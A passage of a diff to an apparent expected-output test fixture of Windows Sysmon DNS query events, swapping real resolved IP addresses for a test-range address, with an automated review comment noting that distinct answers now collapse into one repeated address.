03:34:04.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 trc.taboola.map.fastly.net;::ffff:151.101.194.49;::ffff:151.101.2.49;::ffff:151.101.66.49;::ffff:151.101.130.49;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051710000Z'/\u003e\u003cEventRecordID\u003e166\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 trc.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, @@ -5951,7 +5951,7 @@ "ProcessId": "2736", "QueryName": "match.taboola.com", "QueryStatus": "0", - "QueryResults": "type: 5 trc.taboola.map.fastly.net;::ffff:151.101.194.49;::ffff:151.101.2.49;::ffff:151.101.66.49;::ffff:151.101.130.49;", + "QueryResults": "type: 5 trc.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "process": { 
@@ -5994,7 +5994,7 @@ "ProcessId": "2736", "QueryName": "img-s-msn-com.akamaized.net", "QueryStatus": "0", - "QueryResults": "type: 5 a1834.dspg2.akamai.net;::ffff:23.50.53.185;::ffff:23.50.53.194;", + "QueryResults": "type: 5 a1834.dspg2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:06.056" }, 
@@ -6004,7 +6004,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051902900Z'/\u003e\u003cEventRecordID\u003e167\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.056\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimg-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1834.dspg2.akamai.net;::ffff:23.50.53.185;::ffff:23.50.53.194;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051902900Z'/\u003e\u003cEventRecordID\u003e167\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.056\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimg-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1834.dspg2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" @@ -6028,7 +6028,7 @@ "ProcessId": "2736", "QueryName": "static-entertainment-eus-s-msn-com.akamaized.net", "QueryStatus": "0", - "QueryResults": "type: 5 a1505.g2.akamai.net;::ffff:23.50.53.194;::ffff:23.50.53.186;", + "QueryResults": "type: 5 a1505.g2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:06.064" }, 
@@ -6049,7 +6049,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049319700Z'/\u003e\u003cEventRecordID\u003e168\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.064\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-entertainment-eus-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1505.g2.akamai.net;::ffff:23.50.53.194;::ffff:23.50.53.186;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049319700Z'/\u003e\u003cEventRecordID\u003e168\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.064\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-entertainment-eus-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1505.g2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" } }, { 
@@ -6058,7 +6058,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049334900Z'/\u003e\u003cEventRecordID\u003e169\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.178\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eradarmaps.weather.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 radarmaps.weather.microsoft.com.edgekey.net;type: 5 e15275.g.akamaiedge.net;::ffff:23.217.149.91;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049334900Z'/\u003e\u003cEventRecordID\u003e169\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.178\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eradarmaps.weather.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 radarmaps.weather.microsoft.com.edgekey.net;type: 5 e15275.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "winlog": { "event_id": "22", @@ -6081,7 +6081,7 @@ "ProcessId": "2736", "QueryName": "radarmaps.weather.microsoft.com", "QueryStatus": "0", - "QueryResults": "type: 5 radarmaps.weather.microsoft.com.edgekey.net;type: 5 e15275.g.akamaiedge.net;::ffff:23.217.149.91;" + "QueryResults": "type: 5 radarmaps.weather.microsoft.com.edgekey.net;type: 5 e15275.g.akamaiedge.net;::ffff:89.160.20.156;" }, "process": { "thread": { 
@@ -6101,7 +6101,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049349000Z'/\u003e\u003cEventRecordID\u003e170\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.455\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-entertainment-eus-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1505.g2.akamai.net;::ffff:23.50.53.194;::ffff:23.50.53.186;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049349000Z'/\u003e\u003cEventRecordID\u003e170\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.455\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-entertainment-eus-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1505.g2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, @@ -6124,7 +6124,7 @@ "ProcessId": "356", "QueryName": "static-entertainment-eus-s-msn-com.akamaized.net", "QueryStatus": "0", - "QueryResults": "type: 5 a1505.g2.akamai.net;::ffff:23.50.53.194;::ffff:23.50.53.186;", + "QueryResults": "type: 5 a1505.g2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:06.455" }, 
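Review bot: The new `QueryResults` value in the @@ -6124 hunk (and the matching `event.original` string just above it) replaces two distinct answers, `::ffff:23.50.53.194` and `::ffff:23.50.53.186`, with the same address twice, `::ffff:89.160.20.156;::ffff:89.160.20.156;`, so this fixture no longer demonstrates that the pipeline keeps multiple distinct resolved addresses apart (for example in `related.ip` or `dns.resolved_ip`, if those are populated and deduplicated). The same collapse appears in the `www.bing.com` hunks at @@ -6191 and @@ -6215, where `204.79.197.200` and `13.107.21.200` both become `89.160.20.156`. Using a second address from the supported test range for the second answer would keep the multi-answer coverage these records previously provided. As this looks like an expected-output file, the input fixture would need the matching change and the file regenerated rather than edited by hand — I am inferring that workflow from the file's shape.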
@@ -6156,7 +6156,7 @@
 "ProcessId": "2736",
 "QueryName": "tag.sp.advertising.com",
 "QueryStatus": "0",
- "QueryResults": "type: 5 cs747173190.wac.omegacdn.net;::ffff:152.195.32.163;",
+ "QueryResults": "type: 5 cs747173190.wac.omegacdn.net;::ffff:89.160.20.156;",
 "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe",
 "UtcTime": "2019-07-18 03:34:06.494",
 "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}"
@@ -6172,7 +6172,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049364200Z'/\u003e\u003cEventRecordID\u003e171\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.494\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etag.sp.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs747173190.wac.omegacdn.net;::ffff:152.195.32.163;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049364200Z'/\u003e\u003cEventRecordID\u003e171\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.494\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etag.sp.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs747173190.wac.omegacdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -6191,7 +6191,7 @@ "ProcessId": "2736", "QueryName": "www.bing.com", "QueryStatus": "0", - "QueryResults": "type: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:204.79.197.200;::ffff:13.107.21.200;" + "QueryResults": "type: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;" }, "user": { "identifier": "S-1-5-18" 
@@ -6215,7 +6215,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049377200Z'/\u003e\u003cEventRecordID\u003e172\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.567\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:204.79.197.200;::ffff:13.107.21.200;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049377200Z'/\u003e\u003cEventRecordID\u003e172\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.567\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a-0001.a-afdentry.net.trafficmanager.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" } 
@@ -6226,7 +6226,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:08.054270200Z'/\u003e\u003cEventRecordID\u003e173\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity 